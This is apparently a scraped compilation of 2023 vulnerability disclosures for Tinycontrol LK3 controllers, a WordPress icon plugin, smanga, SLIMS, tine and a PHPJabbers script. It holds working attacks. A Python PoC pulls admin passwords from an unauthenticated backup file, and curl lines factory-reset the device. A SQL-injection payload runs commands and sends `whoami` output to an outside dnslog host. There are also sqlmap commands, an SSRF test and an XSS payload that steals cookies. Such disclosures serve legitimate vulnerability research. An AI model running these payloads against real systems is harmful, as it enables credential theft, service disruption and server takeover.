Tinycontrol LAN Controller version 3 suffers from an issue where an unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

    #!/usr/bin/env python### Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC### Vendor: Tinycontrol# Product web page: https://www.tinycontrol.pl# Affected version: <=1.58a, HW 3.8## Summary: Lan Controller is a very universal# device that allows you to connect many different# sensors and remotely view their readings and# remotely control various types of outputs.# It is also possible to combine both functions# into an automatic if -> this with a calendar# when -> then. The device provides a user interface# in the form of a web page. The website presents# readings of various types of sensors: temperature,# humidity, pressure, voltage, current. It also# allows you to configure the device, incl. event# setting and controlling up to 10 outputs. Thanks# to the support of many protocols, it is possible# to operate from smartphones, collect and observ# the results on the server, as well as cooperation# with other I/O systems based on TCP/IP and Modbus.## Desc: An unauthenticated attacker can retrieve the# controller's configuration backup file and extract# sensitive information that can allow him/her/them# to bypass security controls and penetrate the system# in its entirety.## Tested on: lwIP### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5786# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php### 18.08.2023##import subprocessimport requestsimport base64import sysbinb = "lk3_settings.bin"outf = "lk3_settings.enc"bpatt = "0upassword"epatt = "pool.ntp.org"startf = Falseendf = Falseextral = []print("""    O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O    |                                          |    |     Tinycontrol LK3 1.58 Settings DL     |    |              ZSL-2023-5786               |    |         2023 (c) Zero Science Lab        |    |                                          |    |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|    |                                          |""")if len(sys.argv) != 2:    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))    exit(-0)else:    rhost=sys.argv[1]    if not "http" in rhost:        rhost="http://{}".format(rhost)try:    resp = requests.get(rhost + "/" + binb)    if resp.status_code == 200:        with open(outf, 'wb') as f:            f.write(resp.content)        print(f"[*] Got data as {outf}")    else:        print(f"[!] Backup failed. Status code: {resp.status_code}")except Exception as e:    print("[!] Error:", str(e))    exit(-1)binf = outfsout = subprocess.check_output(["strings", binf], universal_newlines = True)linea = sout.split("\n")for thricer in linea:    if bpatt in thricer:        startf = True    elif epatt in thricer:        endf = True    elif startf and not endf:        extral.append(thricer)if len(extral) >= 4:    userl = extral[1].strip()    adminl = extral[3].strip()    try:        decuser = base64.b64decode(userl).decode("utf-8")        decadmin = base64.b64decode(adminl).decode("utf-8")        print("[+] User password:", decuser)        print("[+] Admin password:", decadmin)    except Exception as e:        print("[!] Error decoding:", str(e))else:    print("[!] Regex failed.")    exit(-2)

Tinycontrol LAN Controller 3 Remote Credential Extraction

Tinycontrol LAN Controller version 3 suffers from an unauthenticated remote denial of service vulnerability. An attacker can issue direct requests to the stm.cgi page to reboot and also reset factory settings on the device.

    Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service ExploitVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The controller suffers from an unauthenticatedremote denial of service vulnerability. An attackercan issue direct requests to the stm.cgi page toreboot and also reset factory settings on the device.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5785Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php18.08.2023--$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1   # reboot controller

Tinycontrol LAN Controller 3 Denial Of Service

The Font Awesome 4 Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'fa' and 'fa-stack' shortcodes in versions up to, and including, 4.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

1<?php2/\*3Plugin Name: Font Awesome 4 Menus4Plugin URI: https://www.newnine.com/plugins/font-awesome-4-menus5Description: Join the retina/responsive revolution by easily adding Font Awesome 4.7.0 icons to your WordPress menus and anywhere else on your site! No programming necessary.6Version: 4.7.07Author: New Nine Media8Author URI: https://www.newnine.com9License: GPLv2 or later10\*/1112/\*13    Copyright 2013-2016  NEW NINE MEDIA  (tel : +1-800-288-9699)1415    This program is free software; you can redistribute it and/or modify16    it under the terms of the GNU General Public License, version 2, as 17    published by the Free Software Foundation.1819    This program is distributed in the hope that it will be useful,20    but WITHOUT ANY WARRANTY; without even the implied warranty of21    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the22    GNU General Public License for more details.2324    You should have received a copy of the GNU General Public License25    along with this program; if not, write to the Free Software26    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA27\*/2829class FontAwesomeFour {3031    public static $defaults \= array(32        'maxcdn\_location' \=> 'https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css',33        'spacing' \=> 1,34        'stylesheet' \=> 'local',35        'version' \=> '4.7.0'36    );3738    function \_\_construct(){39        global $wp\_version;4041        add\_action( 'admin\_enqueue\_scripts', array( $this, 'admin\_enqueue\_scripts' ) );42        add\_action( 'admin\_menu', array( $this, 'admin\_menu' ) );43        add\_action( 'admin\_notices', array( $this, 'admin\_notices' ) );44        add\_action( 'wp\_enqueue\_scripts', array( $this, 'wp\_enqueue\_scripts' ) );4546        add\_filter( 'nav\_menu\_css\_class', array( $this, 'nav\_menu\_css\_class' ) );47        add\_filter( 'walker\_nav\_menu\_start\_el', array( $this, 'walker\_nav\_menu\_start\_el' ), 10, 4 );4849        add\_shortcode( 'fa', array( $this, 'shortcode\_icon' ) );50        add\_shortcode( 'fa-stack', array( $this, 'shortcode\_stack' ) );51    }5253    function admin\_enqueue\_scripts( $hook ){54        if( 'settings\_page\_n9m-font-awesome-4-menus' \== $hook ){55            wp\_enqueue\_style( 'n9m-admin-font-awesome-4', plugins\_url( 'css/font-awesome.min.css', \_\_FILE\_\_ ), false, self::$defaults\[ 'version' \] );56        }57    }5859    function admin\_menu(){60        add\_submenu\_page( 'options-general.php', 'Font Awesome 4 Menus', 'Font Awesome', 'edit\_theme\_options', 'n9m-font-awesome-4-menus', array( $this, 'admin\_menu\_cb' ) );61    }6263    function admin\_menu\_cb(){64        if( $\_POST && check\_admin\_referer( 'n9m-fa' ) ){65            $settings \= array();66            switch( $\_POST\[ 'n9m\_location' \] ){67                case 'local':68                case 'maxcdn':69                case 'none':70                    $settings\[ 'stylesheet' \] \= $\_POST\[ 'n9m\_location' \];71                    break;72                case 'other':73                    $settings\[ 'stylesheet' \] \= 'other';74                    $settings\[ 'stylesheet\_location' \] \= sanitize\_text\_field( $\_POST\[ 'n9m\_location-other-location' \] );75                    break;76            }77            if( isset( $\_POST\[ 'n9m\_text\_spacing' \] ) ){78                $settings\[ 'spacing' \] \= 1;79            } else {80                $settings\[ 'spacing' \] \= 0;81            }82            update\_option( 'n9m-font-awesome-4-menus', $settings );83            print '<div class="updated"><p>Your settings have been saved!</p></div>';84        }85        $settings \= get\_option( 'n9m-font-awesome-4-menus', self::$defaults );86        print ' <div class="wrap">87                    <h2><i class="fa fa-thumbs-o-up"></i> ' . get\_admin\_page\_title() . '</h2>88                    <p>Thank you for using Font Awesome 4 Menus by <a href="https://www.newnine.com" target="\_blank">New Nine</a>! To view available icons, <a href="http://fortawesome.github.io/Font-Awesome/icons/" target="\_blank">click here to visit the Font Awesome website</a>.</p>89                    <form action="' . admin\_url( 'options-general.php?page=n9m-font-awesome-4-menus' ) . '" method="post">90                        <h3>Font Awesome Stylesheet</h3>91                        <p>Select how you want Font Awesome 4&#8217;s stylesheet loaded on your site (if at all):</p>92                        <table class="form-table">93                            <tbody>94                                <tr>95                                    <th scope="row">Load Font Awesome 4 From:</th>96                                    <td>97                                        <fieldset>98                                            <legend class="screen-reader-text"><span>Load Font Awesome 4 From</span></legend>99                                            <label for="n9m\_location-local"><input type="radio" name="n9m\_location" id="n9m\_location-local" value="local"' . ( 'local' \== $settings\[ 'stylesheet' \] ? ' checked' : false ) . '> Local plugin folder (default)</label>100                                            <br />101                                            <label for="n9m\_location-maxcdn"><input type="radio" name="n9m\_location" id="n9m\_location-maxcdn" value="maxcdn"' . ( 'maxcdn' \== $settings\[ 'stylesheet' \] ? ' checked' : false ) . '> Official Font Awesome CDN <span class="description">(<a href="https://www.bootstrapcdn.com/fontawesome/" target="\_blank">Font Awesome CDN powered by MaxCDN</a>)</span></label>102                                            <br />103                                            <label for="n9m\_location-other"><input type="radio" name="n9m\_location" id="n9m\_location-other" value="other"' . ( 'other' \== $settings\[ 'stylesheet' \] ? ' checked' : false ) . '> A custom location:</label> <input type="text" name="n9m\_location-other-location" id="n9m\_location-other-location" placeholder="Enter full url here" class="regular-text" value="' . ( isset( $settings\[ 'stylesheet\_location' \] ) ? $settings\[ 'stylesheet\_location' \] : '' ) . '">104                                            <br />105                                            <label for="n9m\_location-none"><input type="radio" name="n9m\_location" id="n9m\_location-none" value="none"' . ( 'none' \== $settings\[ 'stylesheet' \] ? ' checked' : false ) . '> Don&#8217;t load Font Awesome 4&#8217;s stylesheet <span class="description">(use this if you load Font Awesome 4 elsewhere on your site)</span></label>106                                        </fieldset>107                                    </td>108                                </tr>109                            </tbody>110                        </table>111                        <h3>Icon Spacing</h3>112                        <p>By default, Font Awesome 4 Menus adds a space before or after the icon in your menu. Uncheck the box below to remove this space and give you finer control over your custom styling.</p>113                        <p><label for="n9m\_text\_spacing"><input type="checkbox" name="n9m\_text\_spacing" id="n9m\_text\_spacing" value="1"' . ( 1 \== $settings\[ 'spacing' \] ? ' checked' : false ) . '> Keep the space between my text and my icons <span class="description">(default is checked)</span></label>114                        <p>' . wp\_nonce\_field( 'n9m-fa' ) . '<button type="submit" class="button button-primary">Save Settings</button></p>115                    </form>116                </div>';117    }118119    function admin\_notices(){120        global $current\_user, $pagenow;121        if( isset( $\_REQUEST\[ 'action' \] ) && 'kill-n9m-font-awesome-4-notice' \== $\_REQUEST\[ 'action' \] ){122            update\_user\_meta( $current\_user\->data\->ID, 'n9m-font-awesome-4-notice-hide', 1 );123        }124        $shownotice \= get\_user\_meta( $current\_user\->data\->ID, 'n9m-font-awesome-4-notice-hide', true );125        if( 'plugins.php' \== $pagenow && !$shownotice ){126            print ' <div class="updated is-dismissible">127                        <div style="float: right;"><a href="?action=kill-n9m-font-awesome-4-notice" style="color: #7ad03a; display: block; padding: 8px;">&#10008;</a></div>128                        <p>Thank you for installing Font Awesome Menus 4 by <a href="https://www.newnine.com">New Nine</a>! Want to see what else we&#8217;re up to? Subscribe below to our infrequent updates. You can unsubscribe at any time.</p>129                        <form action="http://newnine.us2.list-manage.com/subscribe/post?u=067bab5a6984981f003cf003d&amp;id=1b25a2aee6" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" target="\_blank">130                            <p><input type="text" name="FNAME" placeholder="First Name" value="' . ( !empty( $current\_user\->first\_name ) ? $current\_user\->first\_name : '' ) . '"> <input type="text" name="LNAME" placeholder="Last Name" value="' . ( !empty( $current\_user\->last\_name ) ? $current\_user\->last\_name : '' ) . '"> <input type="text" name="EMAIL" placeholder="Email address" required value="' . $current\_user\->user\_email . '"> <input type="hidden" id="group\_1" name="group\[14489\]\[1\]" value="1"> <input type="submit" name="subscribe" value="Join" class="button action"></p>131                        </form>132                    </div>';133        }134    }135136    function nav\_menu\_css\_class( $classes ){137        if( is\_array( $classes ) ){138            $tmp\_classes \= preg\_grep( '/^(fa)(-\\S+)?$/i', $classes );139            if( !empty( $tmp\_classes ) ){140                $classes \= array\_values( array\_diff( $classes, $tmp\_classes ) );141            }142        }143        return $classes;144    }145146    public static function register\_uninstall\_hook(){147        if( current\_user\_can( 'delete\_plugins' ) ){148            delete\_option( 'n9m-font-awesome-4-menus' );149            $users\_with\_meta \= get\_users( array(150                'meta\_key' \=> 'n9m-font-awesome-4-notice-hide',151                'meta\_value' \=> 1152            ) );153            foreach( $users\_with\_meta as $user\_with\_meta ){154                delete\_user\_meta( $user\_with\_meta\->ID, 'n9m-font-awesome-4-notice-hide' );155            }156        }157    }158159    protected function replace\_item( $item\_output, $classes ){160        $settings \= get\_option( 'n9m-font-awesome-4-menus', FontAwesomeFour::$defaults );161        $spacer \= 1 \== $settings\[ 'spacing' \] ? ' ' : '';162163        if( !in\_array( 'fa', $classes ) ){164            array\_unshift( $classes, 'fa' );165        }166167        $before \= true;168        if( in\_array( 'fa-after', $classes ) ){169            $classes \= array\_values( array\_diff( $classes, array( 'fa-after' ) ) );170            $before \= false;171        }172173        $icon \= '<i class="' . implode( ' ', $classes ) . '"></i>';174175        preg\_match( '/(<a.+>)(.+)(<\\/a>)/i', $item\_output, $matches );176        if( 4 \=== count( $matches ) ){177            $item\_output \= $matches\[1\];178            if( $before ){179                $item\_output .= $icon . '<span class="fontawesome-text">' . $spacer . $matches\[2\] . '</span>';180            } else {181                $item\_output .= '<span class="fontawesome-text">' . $matches\[2\] . $spacer . '</span>' . $icon;182            }183            $item\_output .= $matches\[3\];184        }185        return $item\_output;186    }187    188    function shortcode\_icon( $atts ){189        $a \= shortcode\_atts( array(190            'class' \=> ''191        ), $atts );192        if( !empty( $a\[ 'class' \] ) ){193            $class\_array \= explode( ' ', $a\[ 'class' \] );194            if( !in\_array( 'fa', $class\_array ) ){195                $class\_array\[\] \= 'fa';196            }197            return '<i class="' . implode( ' ', $class\_array ) . '"></i>';198        }199    }200    201    function shortcode\_stack( $atts, $content \= null ){202        $a \= shortcode\_atts( array(203            'class' \=> ''204        ), $atts );205        $class\_array \= array();206        if( empty( $a\[ 'class' \] ) ){207            $class\_array \= array( 'fa-stack' );208        } else {209            $class\_array \= explode( ' ', $a\[ 'class' \] );210            if( !in\_array( 'fa-stack', $class\_array ) ){211                $class\_array\[\] \= 'fa-stack';212            }213        }214        return '<span class="' . implode( ' ', $class\_array ) . '">' . do\_shortcode( $content ) . '</span>';215    }216217    function walker\_nav\_menu\_start\_el( $item\_output, $item, $depth, $args ){218        if( is\_array( $item\->classes ) ){219            $classes \= preg\_grep( '/^(fa)(-\\S+)?$/i', $item\->classes );220            if( !empty( $classes ) ){221                $item\_output \= $this\->replace\_item( $item\_output, $classes );222            }223        }224        return $item\_output;225    }226227    function wp\_enqueue\_scripts(){228        $settings \= get\_option( 'n9m-font-awesome-4-menus', self::$defaults );229        switch( $settings\[ 'stylesheet' \] ){230            case 'local':231                wp\_register\_style( 'font-awesome-four', plugins\_url( 'css/font-awesome.min.css', \_\_FILE\_\_ ), array(), self::$defaults\[ 'version' \], 'all' );232                wp\_enqueue\_style( 'font-awesome-four' );233                break;234            case 'maxcdn':235                wp\_register\_style( 'font-awesome-four', self::$defaults\[ 'maxcdn\_location' \], array(), self::$defaults\[ 'version' \], 'all' );236                wp\_enqueue\_style( 'font-awesome-four' );237                break;238            case 'none':239                break;240            case 'other':241                wp\_register\_style( 'font-awesome-four', $settings\[ 'stylesheet\_location' \], array(), self::$defaults\[ 'version' \], 'all' );242                wp\_enqueue\_style( 'font-awesome-four' );243                break;244        }245    }246247    public static function write\_log( $log ){248        if( is\_array( $log ) || is\_object( $log ) ){249            error\_log( print\_r( $log, true ) );250        } else {251            error\_log( $log );252        }253    }254    255}256$n9m\_font\_awesome\_four \= new FontAwesomeFour();257258register\_uninstall\_hook( \_\_FILE\_\_, array( 'FontAwesomeFour', 'register\_uninstall\_hook' ) );

CVE-2023-4718: n9m-font-awesome-4.php in font-awesome-4-menus/trunk – WordPress Plugin Repository

A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4711

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php.

**测试环境说明**

*   版本：3.2.7（最新版）
*   环境：docker

docker搭建所使用的命令：

    docker run -itd --name smanga \
    -p 3333:3306 \
    -p 8097:80 \
    -v /mnt:/mnt \
    -v /route/smanga:/data \
    -v /route/compress:/compress \
    lkw199711/smanga;
    

**1、未授权远程代码执行**

*   漏洞描述

**/php/manga/delete.php**接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。

Payload：

    mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";ping -c 3 `whoami`.357efab8.dns.dnsmap.org.;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
    

*   漏洞复现

payload中触发RCE的是第5个联合查询项，执行命令会先获取服务器用户名并携带用户名信息往dnslog域名发送icmp包，测试成功收到dnslog记录，且获取回显信息。

 

*   漏洞原理  
    payload中通过sql联合查询拼接自己构造的查询项，构造第5个查询项为命令注入点，即mangaPath的值，程序中删除逻辑没有对参数进行过滤，直接使用rm -rf拼接mangaPath删除，造成了命令注入。

其中拼接sql语句的select方法中使用where方法将每个条件进行and分割，干扰了正常union查询的构造，所以不使用逗号，而使用join的形式绕过。

**2、未授权SQL注入**

*   漏洞描述

**补充说明：类似的位置还有很多，均是没有对参数点进行过滤，造成多种类型的SQL注入，修复时可参考一并修复。**

**php/history/add.php**接口处没有对mediaId、mangaId和userId三个参数进行过滤，导致拼接任意sql命令，造成sql注入，未授权的攻击者可获取数据库权限。

*   漏洞复现

使用基于时间的盲注测试mediaId接口。  
构造Payload分别为sleep 6秒和3秒，成功满足预期效果。

    if(now()=sysdate()%2Csleep(3)%2C0)
    

    if(now()=sysdate()%2Csleep(6)%2C0)
    

使用sqlmap利用测试，成功获取数据库名：

*   漏洞原理

sql语句查询没有对接收的参数进行过滤。

**3、未授权任意文件读取**

*   漏洞描述

**/php/get-file-flow.php**接口处file参数没有进行过滤，存在路径遍历，造成任意文件读取漏洞，未授权的攻击者可读取配置文件。

*   漏洞复现

尝试读取/etc/passwd

尝试读取config.ini

*   漏洞原理

没有对file参数进行过滤，导致任意文件读取。

CVE-2023-36076: 3个高危漏洞 · Issue #100 · lkw199711/smanga

Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.

**The bug**

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/\* RECORD OPERATION \*/
if (isset($\_POST\['saveData'\])) {
    $data\['member\_type\_id'\] = $\_POST\['memberTypeID'\];
    $data\['coll\_type\_id'\] = $\_POST\['collTypeID'\];
    $data\['gmd\_id'\] = $\_POST\['gmdID'\];
    $data\['loan\_limit'\] = trim($\_POST\['loanLimit'\]);
    $data\['loan\_periode'\] = trim($\_POST\['loanPeriode'\]);
    $data\['reborrow\_limit'\] = trim($\_POST\['reborrowLimit'\]);
    $data\['fine\_each\_day'\] = trim($\_POST\['fineEachDay'\]);
    $data\['grace\_periode'\] = trim($\_POST\['gracePeriode'\]);
    $data\['input\_date'\] = date('Y-m-d');
    $data\['last\_update'\] = date('Y-m-d');
    // create sql op object
    $sql\_op = new simbio\_dbop($dbs);
    if (isset($\_POST\['updateRecordID'\])) {
        /\* UPDATE RECORD MODE \*/
        // remove input date
        unset($data\['input\_date'\]);
        // filter update record ID
        $updateRecordID = (integer)$\_POST\['updateRecordID'\];
        // update the data
        $update = $sql\_op\->update('mst\_loan\_rules', $data, 'loan\_rules\_id='.$updateRecordID);
        if ($update) {
            toastr(\_\_('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(parent.jQuery.ajaxHistory\[0\].url);</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Updated. Please Contact System Administrator')."\\nDEBUG : ".$sql\_op\->error)->error(); }
        exit();
    } else {
        /\* INSERT RECORD MODE \*/
        $insert = $sql\_op\->insert('mst\_loan\_rules', $data); // BUG HERE
        if ($insert) {
            toastr(\_\_('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(\\''.$\_SERVER\['PHP\_SELF'\].'\\');</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Save. Please Contact System Administrator')."\\n".$sql\_op\->error)->error(); }
        exit();
    }
    exit();
} 

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to circulation
    
2.  make sure burp suit is on to capture the request such as below:
    

3.  save the request into a file (example.req)
    
4.  run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  
    
5.  voila
    

**example.req**

    POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
    Host: localhost
    Content-Length: 1195
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
    Accept-Encoding: gzip, deflate
    Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
    Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
    Connection: close
    
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="csrf_token"
    
    98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="memberTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="collTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gmdID"
    
    0
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanPeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="reborrowLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gracePeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="saveData"
    
    Save
    ------WebKitFormBoundarypqBOyIslkQAaoPCi--
    

**Screenshots****proof-of-concept current database**

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  --current-db  

**versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

**notes**

added comment of the bug. last edit at 18 August 2023 21.12 GMT+7

CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php.

**The bug**

A Server Side Request Forgery exists in admin/modules/bibliography/pop_p2p.php at the code below

$detail\_uri = $\_GET\['uri'\] . "/index.php?p=show\_detail&inXML=true&id=" . $\_GET\['biblioID'\];
// parse XML
$data = modsXMLsenayan($detail\_uri, 'uri');

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to bibliography
2.  set up netcat to listen to a specific port (example: 7878)
3.  go to the /admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878
4.  the netcat should receive a request

**Screenshots****proof-of-concept using pipedream****proof-of-concept using netcat****versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

CVE-2023-40969: [Security Bugs]  Server Side Request Forgery at pop_p2p.php · Issue #204 · slims/slims9_bulian

In tine through 2023.01.14.325, the sort parameter of the /index.php endpoint allows SQL Injection.

**Mehr als nur Groupware**

**tine ist die ideale Software für digitale Zusammenarbeit in Unternehmen und Organisationen. Von kraftvollen Groupware-Funktionalitäten bis hin zu cleveren AddOns vereint **tine** alles, um die tägliche Zusammenarbeit im Team zu erleichtern.**

**Kalender****Mit tine wird das Termin­management zum Kinder­spiel. Egal, ob Einzel­termine, Serien­termine oder Ressourcen­planung mit Mitarbeitern oder externen Personen – tine ermöglicht eine unkomplizierte Termin­findung. Schnell und einfach.**

**Adress­buch****Zugegeben: Adressbuch ist eine glatte Unter­treibung. Hier geht es um mehr als eine reine Adress­sammlung. Das tine-Adress­buch ist der perfekte Beziehungs­manager!**

**E-Mail****Mehr als 600 E-Mails erhalten wir durch­schnitt­lich pro Monat am Arbeits­platz. E-Mails sind noch immer, trotz vieler Alter­nativen, das beliebteste Kommu­nika­tions­tool. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features und schon haben Sie mehr Zeit für wichtigere Dinge!**

**Adressbuch**

Zugegeben: Adressbuch ist eine glatte Untertreibung. Hier geht es um mehr als eine reine Adresssammlung. Das Adressbuch ist der perfekte Beziehungsmanager!

**E-Mail**

Mehr als 600 E-Mails erhalten wir durchschnittlich pro Monat am Arbeitsplatz. Versenden Sie Ihre E-Mails mit tine, profitieren Sie von den vielen kleinen Features!

**Aufgaben**

Arbeiten Sie noch mit klassischen ToDo-Listen? Also Aufgaben auf Zettel schreiben und sobald sie erledigt sind, durchstreichen?  
Zeit für eine neue Ära!

**Dateimanager**

Für alle die unterwegs oder gemeinsam an Dokumenten arbeiten: Zentral ablegen, teilen, vor unerlaubtem Zugriff schützen und immer überall abrufen.

**Projektzeiterfassung**

Leistungen werden nicht korrekt abgerechnet? tine hilft Ihnen, Kundenprojekte oder unternehmensintern schneller, genauer und korrekter abzurechnen.

**CRM**

Verwalten und pflegen Sie Ihre Kundenbeziehungen und legen Sie all Ihr Wissen über Ihren Kontakt sicher ab – mit einem uneingeschränktem Zugriff auch von unterwegs!

CVE-2023-41364: HOME - tine

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

Tag

#php